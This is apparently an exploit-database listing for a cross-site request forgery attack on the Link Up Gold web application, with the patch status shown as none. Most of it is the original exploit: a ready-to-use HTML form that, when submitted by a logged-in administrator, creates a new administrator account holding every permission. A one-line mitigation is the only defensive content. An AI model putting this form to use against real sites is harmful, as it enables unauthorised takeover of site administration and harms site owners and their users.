header-logo
Suggest Exploit
vendor:
Link Up Gold
by:
bi0
5.5
CVSS
MEDIUM
CSRF
CWE
Product Name: Link Up Gold
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Link Up Gold – [ CSRF ] Create Administrator Account

This exploit allows an attacker to create an administrator account on the Link Up Gold website through a CSRF attack.

Mitigation:

Implement CSRF tokens and strong authentication mechanisms to prevent CSRF attacks.
Source

Exploit-DB raw data:

                ______     __     ______
               /\  == \   /\ \   /\  __ \
               \ \  __<   \ \ \  \ \ \/\ \
                \ \_____\  \ \_\  \ \_____\
                 \/_____/   \/_/   \/_____/

                 01000010 01101001 01001111

[#]----------------------------------------------------------------[#]
#
# [+] Link Up Gold - [ CSRF ] Create Administrator Account
#
#  // Author Info
# [x] Author: bi0
# [x] Contact: bukibv@hotmail.com
# [x] Homepage : www.ssteam.ws
# [x] Thanks: sp1r1t,packetdeath,Zer0flag,redking and ssteam.ws ...
#
[#]-------------------------------------------------------------------------------------------[#]
#
# [x] Exploit :
#
# [ CSRF ]
#
#     [ Login ]
#     http://localhost/[path]/administration/index.php
#
# // Start CSRF
|-------------------------------------------------------------------------------|
<html>
<body>
<form action="http://[server]/[path]/administration/administrators.php" method="POST">
  <input type="hidden" name="action" value="admin_created">
  <!-- chose username -->
  <input   name="username" value="admintest" maxlength=15
   <!-- chose password -->
  <input   name="password" value="admintest" maxlength=15>
   <!-- chose email -->
  <input   name="email" value="admintest@lol.com" maxlength="255">
  <!-- chose name -->
  <input  name="name" value="admintest" maxlength="255">
 <input type="hidden" name="rights[]" value="links" CHECKED>
 <input type="hidden" name="rights[]" value="all_links" CHECKED>
 <input type="hidden" name="rights[]" value="categories_links" CHECKED>
 <input type="hidden" name="rights[]" value="articles" CHECKED>
 <input type="hidden" name="rights[]" value="all_articles" CHECKED>
 <input type="hidden" name="rights[]" value="categories_articles" CHECKED>
 <input type="hidden" name="rights[]" value="email_owners" CHECKED>
 <input type="hidden" name="rights[]" value="blacklist" CHECKED>
 <input type="hidden" name="rights[]" value="polls" CHECKED>
 <input type="hidden" name="rights[]" value="users" CHECKED>
 <input type="hidden" name="rights[]" value="email_users" CHECKED>
 <input type="hidden" name="rights[]" value="newsletter" CHECKED>
 <input type="hidden" name="rights[]" value="board" CHECKED>
 <input type="hidden" name="rights[]" value="search_log" CHECKED>
 <input type="hidden" name="rights[]" value="ads" CHECKED>
 <input type="hidden" name="rights[]" value="adlinks" CHECKED>
 <input type="hidden" name="rights[]" value="news" CHECKED>
 <input type="hidden" name="rights[]" value="messages" CHECKED>
 <input type="hidden" name="rights[]" value="templates" CHECKED>
 <input type="hidden" name="rights[]" value="adv_prices_orders" CHECKED>
 <input type="hidden" name="rights[]" value="admins" CHECKED>
 <input type="hidden" name="rights[]" value="database_tools" CHECKED>
 <input type="hidden" name="rights[]" value="configuration"CHECKED>
 <input type="hidden" name="rights[]" value="reset_rebuild" CHECKED>
 <input type="submit" name="submit" value="Submit">
</form>
</body>
</html>

|-------------------------------------------------------------------------------|
# // End of attack
#
[#]------------------------------------------------------------------------------------------[#]

#EOF